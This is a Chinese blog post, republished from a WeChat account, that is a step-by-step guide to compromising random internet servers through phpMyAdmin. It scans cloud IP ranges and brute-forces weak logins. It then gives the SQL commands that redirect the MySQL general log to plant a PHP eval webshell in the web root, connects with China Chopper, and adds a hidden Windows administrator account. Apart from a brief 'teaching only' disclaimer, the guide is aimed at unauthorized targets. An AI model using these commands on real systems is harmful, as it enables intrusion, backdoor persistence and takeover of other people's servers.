phpmyadmin从找目标到拿下服务器

微信专员 4年前 (2020-04-05) 网络安全 92 0
TAGS:phpmyadmin
广东服务器大促销查看详情

前段时间写了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。

首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。

phpmyadmin从找目标到拿下服务器-第1张图片-新之洲IDC资讯

 

找到以后百度随便找个工具扫描IP段,大的运营商一般直接后两个大段都是他的

然后找到IP段以后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段

我用的这个叫S-Xing,百度来的,不知道有没有后门,所以就不提供了

phpmyadmin从找目标到拿下服务器-第2张图片-新之洲IDC资讯

 

phpmyadmin从找目标到拿下服务器-第3张图片-新之洲IDC资讯

 

扫描好以后导入刚才扫描好的IP

phpmyadmin从找目标到拿下服务器-第4张图片-新之洲IDC资讯

 

然后选择自动后缀

phpmyadmin从找目标到拿下服务器-第5张图片-新之洲IDC资讯

 

线程根据自己配置来配置,我直接选择最高500,然后开始爆破

phpmyadmin从找目标到拿下服务器-第6张图片-新之洲IDC资讯

 

爆破结果


phpmyadmin从找目标到拿下服务器-第7张图片-新之洲IDC资讯

 

随便选择一个开搞

先看一下服务器信息xx.xx.xx.xx/l.php

phpmyadmin从找目标到拿下服务器-第8张图片-新之洲IDC资讯


 

网站路径什么的都爆出来了,登录后台

phpmyadmin从找目标到拿下服务器-第9张图片-新之洲IDC资讯


 

老规矩,查下mysql日志文件路径

phpmyadmin从找目标到拿下服务器-第10张图片-新之洲IDC资讯

 

先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php'; 

修改当前日志文件到网站目录下

set global general_log ="ON";                开启mysql记录日志

select '<?php eval($_POST[sean]);?>';   插入PHP        一句话木马

set global general_log ="OFF";              关闭mysql记录日志

phpmyadmin从找目标到拿下服务器-第11张图片-新之洲IDC资讯

 

执行成功

phpmyadmin从找目标到拿下服务器-第12张图片-新之洲IDC资讯

 

接下来上菜刀连接上传好的一句话木马

phpmyadmin从找目标到拿下服务器-第13张图片-新之洲IDC资讯


phpmyadmin从找目标到拿下服务器-第14张图片-新之洲IDC资讯

 

用net user admin$ sean2018.. /add & net localgroup administrators admin$ /add创建一个管理员账号

phpmyadmin从找目标到拿下服务器-第15张图片-新之洲IDC资讯

 


账号已存在,那就直接修改密码了,带$符号的都是被影藏账号,估计被日了多少次了吧

phpmyadmin从找目标到拿下服务器-第16张图片-新之洲IDC资讯

 

接下来连接试试

phpmyadmin从找目标到拿下服务器-第17张图片-新之洲IDC资讯

 

phpmyadmin从找目标到拿下服务器-第18张图片-新之洲IDC资讯


 

玩完,收工,文章内所有的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门所以就不提供下载了,怕中毒找个虚拟机搞,自己折腾吧。

本文章只做教学思路,请勿用于非法用途


文章来自微信公众号:黑白之道

版权声明:部分文章内容、图片来源于互联网获取,如有侵权请联系删除,发送邮件:server889#qq.com 请将#改为@,我们将第一时间审核处理!

相关推荐

网友评论

  • (*)

最新评论